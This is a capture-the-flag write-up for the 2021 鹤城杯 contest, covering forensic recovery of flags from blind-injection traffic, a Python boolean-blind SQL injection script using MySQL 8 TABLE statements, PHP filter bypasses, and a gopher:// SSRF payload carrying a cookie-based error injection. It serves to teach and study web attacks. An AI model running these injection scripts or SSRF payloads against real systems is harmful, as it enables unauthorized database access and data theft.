2021鹤城杯

Preface

I had classes all day today but squeezed in some time for 鹤城杯. I solved two web challenges; the third looked doable, since on the way to class I had found the bypass technique, but a senior teammate solved it in the end (tql). I also did two traffic-forensics misc challenges, which went fine. Here I'm posting the ones I solved and also noting the ones I didn't.

middle_magic

The usual, overused PHP black magic.
[image]

Traffic forensics

The flag is recovered from the blind-injection traffic in the capture.
[image]

flag{w1reshARK_ez_1sntit}

easy_sql_2

Got tenth blood, though it could have been faster; a pity I had class in the morning.

select is filtered, which points to either stacked queries or the MySQL 8.0 TABLE statement. A quick test showed MySQL 8.0 (8.0.26, see the script), so I injected with TABLE.
TABLE t (added in MySQL 8.0.19) returns every row of t like SELECT * FROM t and accepts ORDER BY and LIMIT, so it works as a scalar subquery on a single-column table (substr((table fl11aag limit 1,1),i,1)) and as the right-hand side of a row comparison (('ctf','guess',1,1,1,1) < (table mysql.innodb_table_stats order by database_name limit 1,1)), which reads names out of mysql.innodb_table_stats (6 columns) or information_schema.tables (21 columns) without the word select. Row comparison is lexicographic, so the guessed prefix sorts before the row until it overshoots the real name. The login page leaks whether the WHERE clause matched: a true condition gives "password error!", a false one "username error!".

import requests

# Assumption: the original post does not show the target URL or the session setup.
url = "http://TARGET/index.php"  # placeholder, fill in the challenge URL
s = requests.Session()


def sql_injection(pay_lo):  # database name, version, or any single-column expression
    fina_wod = ""
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # boolean condition on one character; /**/ replaces spaces for the space filter
            payload_1 = f"admin'and ascii(substr(({pay_lo}),{i},1))>{mid}#".replace(" ", "/**/")
            data = {
                'username': payload_1,
                'password': "1"
            }
            # print(data)
            r = s.post(url=url, data=data).text
            print(r)
            if "password error!" in r:   # username matched, so the condition was true
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32 or mid == 128:      # no character at this position: done
            break
        fina_wod += chr(mid)
        print(fina_wod)


def sql_injection_s():  # table name, by row comparison against a TABLE statement
    fina_wod = ""
    a = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    for i in range(0, 100):
        for j in range(0, 62):
            # information_schema.tables has 21 columns, mysql.innodb_table_stats only 6
            # payload_2=f"admin'and (('def','ctf','{fina_wod+a[j]}','',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)<(table information_schema.tables order by TABLE_SCHEMA limit 1,1))#".replace(" ","/**/")
            payload_2 = f"admin'and ('ctf','{fina_wod+a[j]}',1,1,1,1)<(table mysql.innodb_table_stats order by database_name limit 1,1)#".replace(" ", "/**/")
            data = {
                'username': payload_2,
                'password': "1"
            }
            r = s.post(url=url, data=data).text
            print(payload_2)
            print(r)
            if "username error" in r:    # guess no longer sorts before the row: previous char was right
                if j == 0:               # nothing extends the prefix any more: the name is complete
                    return fina_wod
                fina_wod += a[j - 1]
                print(fina_wod)
                break
    return fina_wod


def search_co():  # find which row of innodb_table_stats the ctf database sits at
    for i in range(0, 10000):
        # payload=f"admin'and/**/('def','ct',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)<(table information_schema.tables order by table_schema desc limit {i},1)#".replace(" ","/**/")
        payload = f"admin'and/**/('ct',1,1,1,1,1)<(table mysql.innodb_table_stats order by database_name limit {i},1)#".replace(" ", "/**/")
        data1 = {
            'username': payload,
            'password': "123"
        }
        # print(data1)
        # print(s.post(url=url,data=data1).text)
        if "username error!" in s.post(url=url, data=data1).text:
            print("ctf database is at row", i)


if __name__ == "__main__":
    # payload = "database()"   # ctf
    # payload = "version()"    # 8.0.26-0ubuntu0.20.04.2
    payload = "table fl11aag limit 1,1"   # second row of the single-column flag table
    # search_co()
    # print_word()
    sql_injection(payload)
    # sql_injection_s()

[image]

misc

[images]

Again the flag comes from blind-injection traffic, nothing special. The earlier part of the challenge seemed to be image steganography, which I didn't get; xy 大佬 sent me this traffic-forensics capture.

The ASCII codes pulled from the capture:
99,100,50,99,51,101,50,102,101,97,52,54,51,100,101,100,57,97,102,56,48,48,100,55,49,53,53,98,101,55,97,113,125
which decode to cd2c3e2fea463ded9af800d7155be7aq}
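Both forensics challenges come down to replaying the attacker's boolean-blind probes from the capture. The following is an added example, not part of the write-up: the capture it parses is constructed (each entry is a request URI as it appeared on the wire plus whether the response showed the injected condition as true, which in practice is read off the error string or the page length in a Wireshark export), and the probe shape follows the easy_sql_2 payloads above. It handles "=" probes, which yield the character directly, and ">"/"<" probes, where the character is pinned down only when the attacker's upper and lower bounds meet.

```python
# Added example, not from the write-up: rebuild the extracted string from captured
# boolean-blind requests. CAPTURE is constructed; real input comes from a pcap export.
import re
from urllib.parse import quote, unquote

# matches ascii(substr((<expr>),<pos>,1)) <op> <value> once /**/ has been normalised
PROBE = re.compile(r"substr\(\((.+?)\),(\d+),1\)\)\s*(=|>|<)\s*(\d+)", re.IGNORECASE)


def recover(capture):
    """capture: iterable of (request_uri, condition_true). Returns the recovered string,
    with '?' for positions the attacker never narrowed to one value, and those positions."""
    lower, upper, exact = {}, {}, {}
    for uri, true in capture:
        m = PROBE.search(unquote(uri).replace("/**/", " "))
        if not m:
            continue
        pos, op, val = int(m.group(2)), m.group(3), int(m.group(4))
        if op == "=":
            if true:
                exact[pos] = val
        elif op == ">":            # c > v true  => c >= v+1 ; false => c <= v
            if true:
                lower[pos] = max(lower.get(pos, 0), val + 1)
            else:
                upper[pos] = min(upper.get(pos, 255), val)
        else:                      # c < v true  => c <= v-1 ; false => c >= v
            if true:
                upper[pos] = min(upper.get(pos, 255), val - 1)
            else:
                lower[pos] = max(lower.get(pos, 0), val)
    chars = dict(exact)
    for pos in set(lower) | set(upper):
        if pos not in chars and pos in lower and lower[pos] == upper.get(pos):
            chars[pos] = lower[pos]
    last = max(set(chars) | set(lower) | set(upper), default=0)
    text = "".join(chr(chars[p]) if p in chars else "?" for p in range(1, last + 1))
    missing = [p for p in range(1, last + 1) if p not in chars]
    return text, missing


def probe_uri(pos, op, val):
    """Constructed request in the shape of the easy_sql_2 payloads above."""
    cond = f"admin'and ascii(substr((table fl11aag limit 1,1),{pos},1)){op}{val}#"
    return "/login?username=" + quote(cond.replace(" ", "/**/"), safe="") + "&password=1"


# Constructed capture: equality probes for positions 1 and 4, a binary search with '>'
# for position 2, '<' probes for position 3, and an unfinished search at position 5.
CAPTURE = [
    (probe_uri(1, "=", 100), False), (probe_uri(1, "=", 102), True),
    (probe_uri(2, ">", 80), True), (probe_uri(2, ">", 104), True),
    (probe_uri(2, ">", 116), False), (probe_uri(2, ">", 110), False),
    (probe_uri(2, ">", 107), True), (probe_uri(2, ">", 109), False),
    (probe_uri(2, ">", 108), False),
    (probe_uri(3, "<", 100), True), (probe_uri(3, "<", 97), False),
    (probe_uri(3, "<", 98), True),
    (probe_uri(4, "=", 103), True),
    (probe_uri(5, ">", 100), True),
]

if __name__ == "__main__":
    print(recover(CAPTURE))
```

The truth value of each response is the only thing the capture has to tell you; when an attacker's search was interrupted, the unresolved positions come back listed rather than guessed.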

easyp

Same kind of black magic.

<?php
include 'flag.php';

if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}

if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}

if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}

if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}

The first check is bypassed with %0a or %0d placed after utils.php; at first %0a worked for me, later only %0d did. The pattern is matched against PHP_SELF, which includes PATH_INFO, so the request goes to /index.php/utils.php plus a trailing byte: utils\.php\/*$ no longer matches, while basename() still has to reduce the path to utils.php for highlight_file() to show it.
The second check greps REQUEST_URI for the literal show_source and is bypassed through PHP's handling of query-parameter names: '.', ' ' and an unmatched '[' in a parameter name are rewritten to '_', so ?show[source=1 (or ?show.source=1) arrives as $_GET['show_source'] without the string ever appearing in the URI.
The request that worked is in a senior teammate's screenshot, kept here for the record.
[image]
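The two checks reproduced in Python on constructed inputs, as an added example that is not part of the write-up. Python's re follows PCRE in letting "$" also match just before a trailing "\n", so the PHP_SELF pattern behaves here exactly as in PHP; php_param_name is a simplified model of how PHP rewrites query-parameter names ('.' and ' ' become '_', as does an unmatched '['; nested arrays are not handled), and get_keys is a constructed parser on top of it. What basename() does with a trailing byte on the real server is not modelled.

```python
# Added example, not part of the write-up: the easyp checks, the "$"-before-newline
# quirk of the first one, and a check on parsed parameter names instead of the raw URI.
import re
from urllib.parse import unquote, unquote_plus

ORIGINAL = re.compile(r"utils\.php/*$", re.IGNORECASE)   # the challenge's pattern
ANCHORED = re.compile(r"utils\.php/*\Z", re.IGNORECASE)  # "$" with PHP's D modifier


def self_check_blocked(pattern, php_self):
    """True when the first check would exit with 'hacker :)' for this PHP_SELF."""
    return pattern.search(php_self) is not None


def php_param_name(raw):
    """Query-string key as PHP stores it in $_GET (simplified rewrite, see above)."""
    head, bracket, tail = raw.partition("[")
    head = head.lstrip(" ").replace(".", "_").replace(" ", "_")
    if bracket and "]" not in tail:
        return head + "_" + tail          # an unmatched '[' turns into '_'
    return head + bracket + tail


def get_keys(request_uri):
    """The set of $_GET keys a request would produce (constructed parser)."""
    query = request_uri.partition("?")[2]
    return {php_param_name(unquote_plus(p.partition("=")[0])) for p in query.split("&") if p}


def uri_check_blocked(request_uri):
    """The second check as written: a substring grep over the raw REQUEST_URI."""
    return re.search(r"show_source", request_uri) is not None


def hardened_check_blocked(request_uri):
    """Decide on the parsed parameter names instead of on the URI text."""
    return "show_source" in get_keys(request_uri)


def php_self_of(request_uri):
    """PHP_SELF is the decoded path, including PATH_INFO."""
    return unquote(request_uri.partition("?")[0])


if __name__ == "__main__":
    for uri in ("/index.php/utils.php/%0a?show_source=1",
                "/index.php/utils.php/%0d?show[source=1",
                "/index.php/utils.php/%0d?show.source=1"):
        print(uri, self_check_blocked(ORIGINAL, php_self_of(uri)),
              self_check_blocked(ANCHORED, php_self_of(uri)),
              uri_check_blocked(uri), hardened_check_blocked(uri))
```

The takeaway for the defender is the second function pair: a deny-list regex over the raw URI is checked against a different string than the one the application later uses, so the check has to run on the parsed value.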

spring

This one was also solved by a senior teammate; reportedly it's a known challenge.

Spring Web Flow remote code execution (CVE-2017-4971)

https://juejin.cn/post/7006672559714336805

easy_sql_1

The only challenge I didn't solve.
At first I thought it was SSRF against MySQL, but nothing I tried worked; after the contest other players told me the target is the index.php page itself. Here is the payload:

import base64
from urllib.parse import quote

a = "admin')and (extractvalue(1,concat(0x7e,(select group_concat(flag) from flag),0x7e)))#"
a = quote(base64.b64encode(a.encode("utf-8")))
payload = f'''gopher%3a%2f%2f127.0.0.1%3a80%2f_post%20%2findex.php%20http%2f1.1%250d%250ahost%3a%20localhost%3a80%250d%250acookie%3a%20phpsessid%3d25c1mm4b3ppn9ohr2gve7d4tg4%3bthis_is_your_cookie%3d{a}%250d%250aconnection%3a%20close%250d%250acontent-type%3a%20application%2fx-www-form-urlencoded%250d%250acontent-length%3a%2021%250d%250a%250d%250auname%3dadmin%26passwd%3dadmin'''

Decoded, this is a gopher:// request that POSTs to the local index.php, logs in as admin/admin, and carries the injection in the this_is_your_cookie cookie (base64-encoded; extractvalue() returns the flag through the XPath error message). The whole thing is percent-encoded twice, once to form the gopher payload (CRLF as %0d%0a) and once more, presumably because the URL is passed in a query parameter (%250d%250a). One caveat: the body uname=admin&passwd=admin is 24 bytes, so Content-Length: 21 as sent here is short and the target will read a truncated body; compute it from the actual body.

a = "admin')and (extractvalue(1,concat(0x7e,(select group_concat(flag) from flag),0x7e)))#"
a = quote(base64.b64encode(a.encode("utf-8")))
payload = f'''gopher://127.0.0.1:80/_post /index.php http/1.1
host: localhost:80
cookie: phpsessid=25c1mm4b3ppn9ohr2gve7d4tg4;this_is_your_cookie={a}
connection: close
content-type: application/x-www-form-urlencoded
content-length: 21

uname=admin&passwd=admin'''
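Building the same gopher:// request from its parts, so that Content-Length matches the body, then adding the second encoding layer and decoding it back to check the framing. This is an added example and not code from the write-up: host, port, path, form fields and the cookie name are those of the payload above; the session id, the helper names and the idea of a ?url= parameter on the SSRF endpoint are constructed assumptions.

```python
# Added example, not from the write-up: gopher:// POST builder with a correct
# Content-Length, the second URL-encoding layer, and a decoder to verify the result.
import base64
from urllib.parse import quote, unquote


def build_gopher_post(host, port, path, body, headers=None):
    """gopher://host:port/_ plus the percent-encoded raw HTTP request. curl strips the
    leading '_' and sends the rest verbatim, so CRLF line endings and an accurate
    Content-Length are what make the target parse it as one POST."""
    lines = [f"POST {path} HTTP/1.1", f"Host: {host}:{port}"]
    lines += [f"{name}: {value}" for name, value in (headers or {}).items()]
    lines += ["Content-Type: application/x-www-form-urlencoded",
              f"Content-Length: {len(body.encode())}",
              "Connection: close", "", body]
    return f"gopher://{host}:{port}/_" + quote("\r\n".join(lines), safe="")


def for_url_param(gopher_url):
    """Second encoding layer: the whole URL travels inside a query parameter of the
    SSRF endpoint (assumed ?url=), so %0d%0a must become %250d%250a or the endpoint
    decodes the CRLFs before curl ever sees them."""
    return quote(gopher_url, safe="")


def decode_gopher(url):
    """Undo one or two encoding layers; returns (host, port, raw_request)."""
    if not url.startswith("gopher://"):
        url = unquote(url)
    hostport, _, selector = url[len("gopher://"):].partition("/_")
    host, _, port = hostport.partition(":")
    return host, int(port or 70), unquote(selector)


def cookie_injection(sql):
    """The injection rides in a cookie: base64, then percent-encoded for the header."""
    return quote(base64.b64encode(sql.encode()).decode(), safe="")


def example_request():
    """The write-up's request with the session id replaced by a constructed value."""
    sql = "admin')and (extractvalue(1,concat(0x7e,(select group_concat(flag) from flag),0x7e)))#"
    cookie = "PHPSESSID=constructedsessionid;this_is_your_cookie=" + cookie_injection(sql)
    return build_gopher_post("127.0.0.1", 80, "/index.php",
                             "uname=admin&passwd=admin", {"Cookie": cookie})


if __name__ == "__main__":
    url = example_request()
    print(for_url_param(url))      # value for the SSRF endpoint's parameter
    print(decode_gopher(url)[2])   # the request the target will see
```

Decoding your own payload before sending it is the quickest way to catch the two classic mistakes, a wrong Content-Length and a missing encoding layer, both of which fail silently on the target.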
Author: vague huang
Posted on: 2021-10-08
Updated on: 2021-10-08
